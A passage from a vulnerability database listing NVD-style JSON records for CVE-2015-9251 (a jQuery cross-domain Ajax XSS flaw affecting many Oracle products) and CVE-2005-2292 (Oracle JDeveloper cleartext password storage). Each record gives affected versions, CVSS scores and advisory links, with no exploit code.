vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_services_gatekeeper:*:*:*:*:*:*:*:*", matchCriteriaId: "97C1FA4C-5163-420C-A01A-EA36F1039BBB", versionEndExcluding: "6.1.0.4.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "77120A3C-9A48-45FC-A620-5072AF325ACF", versionEndExcluding: "7.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.1.0:*:*:*:*:*:*:*", matchCriteriaId: "BED45FB9-410F-4FC6-ACEB-49476F1C50BE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", matchCriteriaId: "9D03A8C9-35A5-4B75-9711-7A4A60457307", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", matchCriteriaId: "BE12B6A4-E128-41EC-8017-558F50B961BE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", matchCriteriaId: "AB654DFA-FEF9-4D00-ADB0-F3F2B6ACF13E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_operations_monitor:3.4:*:*:*:*:*:*:*", 
matchCriteriaId: "835BFCBC-848C-4A2C-BDE7-3D94CEC3F5D8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_operations_monitor:4.0:*:*:*:*:*:*:*", matchCriteriaId: "8A1B7A35-B332-476E-A676-C2CD4D72FA50", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "B5BC32AA-78BE-468B-B92A-5A0FFFA970FA", versionEndIncluding: "7.3.5", versionStartIncluding: "7.3.3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "47E1F95E-A3A5-4996-B951-0F946CB11210", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:*", matchCriteriaId: "703DA91D-3440-4C67-AA20-78F71B1376DD", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:*", matchCriteriaId: "73E05211-8415-42FB-9B93-959EB03B090B", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:*", matchCriteriaId: "AC15899F-8528-4D10-8CD5-F67121D7F293", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:*", matchCriteriaId: "30657F1B-D1FC-4EE6-9854-18993294A01D", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E376C9FB-1870-4B4E-8D69-02A70C0A041C", versionEndIncluding: "8.0.6", versionStartIncluding: "8.0.2", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:*", matchCriteriaId: "DB6C521C-F104-4E26-82F2-6F63F94108BC", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "402B8642-7ACC-4F42-87A9-AB4D3B581751", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:*", matchCriteriaId: "EC3830C0-2B9F-41BD-94C9-E3718467A1AC", versionEndIncluding: "8.0.6", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "6D027285-07C1-4B3A-AB54-4426C16E236A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "3831F35C-DED2-4E40-AA94-1512E106BFF2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "06E586B3-3434-4B08-8BE3-16C528642CA5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.1:*:*:*:*:*:*:*", matchCriteriaId: "3C36C520-B5F5-45F1-B55F-62859CDA012E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2:*:*:*:*:*:*:*", matchCriteriaId: "5EAAFF95-000C-4D78-98FF-9EDE9D966A65", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A5ACB1D2-69CE-4B7D-9B51-D8F80E541631", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_cruise_fleet_management:9.0.11:*:*:*:*:*:*:*", matchCriteriaId: "03C46CCD-B49F-405A-A0A0-E0DFBA60F0D5", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*", matchCriteriaId: "1A3DC116-2844-47A1-BEC2-D0675DD97148", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*", matchCriteriaId: "E0F1DF3E-0F2D-4EFC-9A3E-F72149C8AE94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*", matchCriteriaId: "2AC63D10-2326-4542-B345-31D45B9A7408", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:*", matchCriteriaId: "FCBF2756-B831-4E6E-A15B-2A11DD48DB7C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2:*:*:*:*:*:*:*", matchCriteriaId: "0D76453B-95AF-4AC4-8096-7D117F69B45B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.4:*:*:*:*:*:*:*", matchCriteriaId: "EDE3671B-EB36-490A-BA70-575FCA332B94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.5:*:*:*:*:*:*:*", matchCriteriaId: "E03A631E-253A-4C56-9986-97F86C323482", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", matchCriteriaId: "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:oss_support_tools:19.1:*:*:*:*:*:*:*", matchCriteriaId: "0A81D092-FC04-4B7D-83FB-58D402B5EF9A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", matchCriteriaId: 
"45CB30A1-B2C9-4BF5-B510-1F2F18B60C64", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "D0A735B4-4F3C-416B-8C08-9CB21BAD2889", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:*", matchCriteriaId: "6CBFA960-D242-43ED-8D4C-A60F01B70740", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*", matchCriteriaId: "0513B305-97EF-4609-A82E-D0CDFF9925BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:*", matchCriteriaId: "61A7F6E0-A4A4-4FC3-90CB-156933CB3B9A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "B8249A74-C34A-4F66-8F11-F7F50F8813BF", versionEndIncluding: "17.12", versionStartIncluding: "17.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:real-time_scheduler:2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "A108B4EF-768F-4118-86B5-C0D9CDDE6A6C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_allocation:15.0.2:*:*:*:*:*:*:*", matchCriteriaId: "686D4323-4B05-4B92-B598-594A31F937C3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", matchCriteriaId: "AD4AB77A-E829-4603-AF6A-97B9CD0D687F", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", matchCriteriaId: "6DE15D64-6F49-4F43-8079-0C7827384C86", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_invoice_matching:15.0:*:*:*:*:*:*:*", matchCriteriaId: "788F2530-F011-4489-8029-B3468BAF7787", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_sales_audit:15.0:*:*:*:*:*:*:*", matchCriteriaId: "68B5147A-F6A3-499E-815D-6DAABDA33B03", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9:*:*:*:*:*:*:*", matchCriteriaId: "26C5CF80-8CFF-44D9-B3ED-C259847E9C46", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_workforce_management_software:1.64.0:*:*:*:*:*:*:*", matchCriteriaId: "569644AC-69AD-412D-B399-4052D4DB2928", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "70BEF219-45EC-4A53-A815-42FBE20FC300", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1EA2023A-1AD6-41FE-A214-9D1F6021D6B6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.10:*:*:*:*:*:*:*", matchCriteriaId: "3FFFBA49-F340-4A3D-BE8C-73213A669855", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.11:*:*:*:*:*:*:*", matchCriteriaId: "B491FB70-B6FC-4063-BE00-CAD664B39055", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "70E13C38-9FC3-46BD-B9A4-1033C98C19D3", versionEndIncluding: "4.3.0.4", versionStartIncluding: "4.3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_mobile_workforce_management:2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "AE1E1CA5-D443-4C5D-8F43-550106FFE3DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*", matchCriteriaId: "1BB4709C-6373-43CC-918C-876A6569865A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: 
"F745235C-55A9-4353-A4CB-4B7834BDD63F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:*", matchCriteriaId: "CBFF04EF-B1C3-4601-878A-35EA6A15EF0C", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.", }, { lang: "es", value: "jQuery en versiones anteriores a la 3.0.0 es vulnerable a ataques de Cross-site Scripting (XSS) cuando se realiza una petición Ajax de dominios cruzados sin la opción dataType. Esto provoca que se ejecuten las respuestas de tipo text/javascript.", }, ], id: "CVE-2015-9251", lastModified: "2024-11-21T02:40:09.093", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.0", }, exploitabilityScore: 2.8, impactScore: 2.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-01-18T23:29:00.307", references: [ { source: "cve@mitre.org", url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { 
source: "cve@mitre.org", url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { source: "cve@mitre.org", url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { source: "cve@mitre.org", url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { source: "cve@mitre.org", url: "http://seclists.org/fulldisclosure/2019/May/10", }, { source: "cve@mitre.org", url: "http://seclists.org/fulldisclosure/2019/May/11", }, { source: "cve@mitre.org", url: "http://seclists.org/fulldisclosure/2019/May/13", }, { source: "cve@mitre.org", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/105658", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2020:0481", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/issues/2432", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/2588", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "US Government Resource", ], url: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { source: "cve@mitre.org", url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { source: "cve@mitre.org", url: 
"https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://seclists.org/bugtraq/2019/May/18", }, { source: "cve@mitre.org", url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://snyk.io/vuln/npm:jquery:20150627", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "cve@mitre.org", url: 
"https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "cve@mitre.org", url: "https://www.tenable.com/security/tns-2019-08", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://seclists.org/fulldisclosure/2019/May/10", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://seclists.org/fulldisclosure/2019/May/11", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://seclists.org/fulldisclosure/2019/May/13", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/105658", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://access.redhat.com/errata/RHSA-2020:0481", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/issues/2432", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/2588", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "US Government Resource", ], url: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://seclists.org/bugtraq/2019/May/18", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://snyk.io/vuln/npm:jquery:20150627", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: 
"https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.tenable.com/security/tns-2019-08", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-79", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
oracle | jdeveloper | 9.0.4 | |
oracle | jdeveloper | 9.0.5 | |
oracle | jdeveloper | 10.1.2 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:9.0.4:*:*:*:*:*:*:*", matchCriteriaId: "E292E294-90C2-4780-82B6-1265F8FF6040", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:9.0.5:*:*:*:*:*:*:*", matchCriteriaId: "A5EA5B15-5ABD-459D-8327-9DDC1040C04D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:10.1.2:*:*:*:*:*:*:*", matchCriteriaId: "A4C7F9B0-2BF0-430D-ACB3-8E3A41AD31A3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 stores cleartext passwords in (1) IDEConnections.xml, (2) XSQLConfig.xml and (3) settings.xml, which allows local users to obtain sensitive information.", }, { lang: "es", value: "Oracle JDeveloper 9.0.4, 9.0.5, y 10.1.2 almacena passwords como texto plano en 1) IDEConnections.xml, (2) XSQLConfig.xml y (3) settings.xml. Esto permite que usuarios locales obtengan información confidencial.", }, ], id: "CVE-2005-2292", lastModified: "2025-04-03T01:03:51.193", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "NONE", baseScore: 2.1, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 3.9, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], }, published: "2005-07-18T04:00:00.000", references: [ { source: "cve@mitre.org", url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, { source: "cve@mitre.org", tags: [ "Patch", "Vendor Advisory", ], url: "http://secunia.com/advisories/15991/", }, { source: "cve@mitre.org", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, 
{ source: "cve@mitre.org", tags: [ "Vendor Advisory", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { source: "cve@mitre.org", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://secunia.com/advisories/15991/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-Other", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
